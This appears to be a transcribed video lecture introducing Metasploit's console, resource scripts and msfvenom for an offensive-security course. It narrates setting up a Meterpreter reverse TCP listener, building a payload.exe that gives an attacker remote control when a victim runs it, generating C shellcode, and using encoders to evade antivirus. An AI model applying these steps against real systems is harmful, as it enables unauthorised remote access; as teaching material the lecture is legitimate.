Hello everyone, I'm Typhoon and welcome to another lecture. In this lecture you will learn about Metasploit interfaces. So Metasploit provides several ways to use its features. These include a console, which is command line interface, and graphical user interface. So there's also other tools that give direct access to some functions inside Metasploit framework, and these tools are helpful for writing exploits or when you do not need to use the whole framework. Now, MSF console is the most popular and commonly used part of the Metasploit framework. It is flexible, has many features, and is well supported. MSF console gives you access to almost every option and setting in the framework. You can use it to launch exploits, load extra modules, and also you can perform enumeration and set up listeners. Now, even though Metasploit changes often, the main command in MSF console stays the same. So learning the basic commands will make it easier to use any new features. And in this course, MSF console will be used almost in every section. Now, to start MSF console, we will open a terminal and write sudo MSF console, enter your sudo password, and that is it. Now you will see the Metasploit startup banner followed by the MSF console prompt that looks like this. If the MSF console is not in your system's default path, you may need to go to the directory where it is installed before starting it. Now you can see help for any command in the MSF console by typing, for example, help connect. In this case, I'm curious about inside the connect and will write help connect to see the details about connect command. The output here will show how the command works, what it does, and available options. More details about MSF console will be covered in later sections, so don't worry about that. This is just an introduction lecture to overall MSF console. And yeah, now we also have the resource scripts. Resource scripts are small files that contain Metasploit commands and Ruby code. Instead of typing each command in MSF console one by one, you can create a resource script to run several commands automatically. This is a simple way to save time or combine Metasploit with other tools. Now let's write an example script or let's write some code and use exploit to start a listener on port 443. So we will use exploit multi handler set. We will set the payload. You will learn more about this, so don't worry, just watch it. This is just an introduction lecture, as I said. So you will learn about every detail about MSF console by the end of this course. So set payload, Windows, Meterpreter, reverse TCP. Set lhost, this is going to be attacker's IP address, let's say localhost, and set lport 443. And exploit. That's it. Now, as we do in our other lectures as well, I will start explaining all of these commands one by one. The use command we used at first selects the handler module. This module waits for connection for a payload running on target machine. You can see that. It is exploit, it is multi, and it is handler. The set we used here, the set command, configure the payload and tell it which machine, in this case local host and port, to connect to. We also set the payload. So set commands obviously set something, right? So set something. So set in this case we use the set command to set the payload and set the L host L port here, and lastly we used the exploit to start the listener. Now you can also create a script from it. Let's open the text editor. Now what we will do here, we will write this commands line by line in a text editor file. So use exploit multi handler set payload Windows interpreter reverse TCP set lhost and set lport to 443. Last exploit. Desktop. So test. Here. Now what we will do here, let's exit from the Metasploit, and we will do sudo msf console r. This is going to be our path. So in this case we saved it on desktop, so we will use desktop and msf console test.rc. Now you can see it worked automatically. It's like an application or tool, we can say that. Now spend some time exploring the scripts and what they do. Now we also have this scripts on user share Metasploit framework. That's not it. ls user share Metasploit framework scripts resource, and you can see this scripts and explore the scripts, read it, what's inside, what's not. You will gain some understanding of the basic script here. Now we also have the ARM Teach and Cobalt Strike that works with Metasploit framework. Now in this course you will also learn about the MSF Venom. This is a Metasploit tool for creating shellcode, executables, and more. It is especially useful for making payloads that can be used outside of Metasploit framework. So MSF Venom can generate shellcode in several languages like C, Ruby, Python, JavaScript, assembly, like everything. Now, for example, if you are writing an exploit in a Python, you can generate a payload in a Python format. If it's for a browser exploit, JavaScript might be a better option here. Now, in this example, I will show how to create a malicious executable that connects back to the listener we set up earlier. So we will use MSF Venom P, this is a payload, Windows interpreter, reverse TCP, lhost. This is going to be attacker's IP, in this case your IP, so that this payload will connect back to you. In this case, let's write my own local IP address. F is going to be a file type, which is exe. Output is going to be payload exe. This is the file name. Now, I will explain it again. The P here specifies the payload type. Here we use a reverse TCP interpreter shell. There's also other types of shells which you will learn. And we have the L host. This sets the attacker's IP address. We have F .exe here. This specifies the output format. In this case, this means that this is a Windows executable. And O here specifies the file name, in this case, payload.exe. So when the victim runs this payload, it connects back to the attacker's machine, giving the attacker remote control. So it's like, you can say that it's a remote access Trojan in some way. In some way, it isn't. Yeah. And if you need a shellcode, we can also generate that shellcode here. Now you can see ls, and here this is our payload.exe, and this is just an executable file. Now we can also generate a shellcode to inject into our examples. We also have another lecture, another separate course about how to creating a shellcode in assembly language. With as I remember, it was old, like 6 months ago. I completed that course, but as I remember, it was like we also developed that in C here. So I recommend you, if you are after watching this course, you can also check that if you are interested in developing your career in shellcode development. I don't know what career that will be, but like it will be pretty interesting one, I guess. Yeah. And yeah, if you need a shellcode for an exploit you are writing, you can generate it as a C code fragment. We will do that, but you can do that in other programming languages as well. So we will use same command, but what we will do is we will just remove the f, exe, and payload here, write f and c. Now this creates a shellcode that can be embedded in a C program. However, some shellcode may include null characters. Yeah, this is the null character here, null character. These are not good. You want to remove that null characters, or there's some specific characters that you need to remove that from shellcode. So it's like when you are cooking a meal, like you are the null characters is something bad. You don't want that in your shellcode, because these can cause issues. It can be interpreted as something entirely different by a CPU. So MSF Venom can encode the payload to avoid these bad characters, which we will learn that in next lectures more deeply. So yeah, and MSF Venom, MSF Venom also includes encoders to help avoid detection by antivirus or intrusion detection system. But believe me, this encoders will not work, because they are like everyone is using them, and how can it hide? Well, right? So I suggest you develop your own encoders if you have that intention. But yeah, that's pretty usable. I think it will pretty much save you by some basic antivirus programs. Yeah, and MSF Venom. We will also use MSF Venom. Let's clear that, or new one here. Now, as I said, MSF Venom includes encoders to help avoid detection by antivirus or intrusion detection system. So encoders also help remove bad characters like null bytes, but some encoders are designed for specific use cases like handling alphanumeric only payloads. Others like Shikagata are general purpose and very reliable, but there's some encoders that will corrupt your shellcode. So I don't recommend using encoders very much unless that's your own development. Yeah. So let's list the encoders. MSF Venom encoders. Oh no, not encoders. Oh, that's worked as well. Yeah. So you can experiment with different encoders to see which one works best for your payload. We will cover encoding techniques in more detail in later lectures. You can see the description, rank. Um, I recommend you to select this excellent and good ranks. They also can tell pretty much simple things about their reliability and popularity. But as I said, they will not get the job done.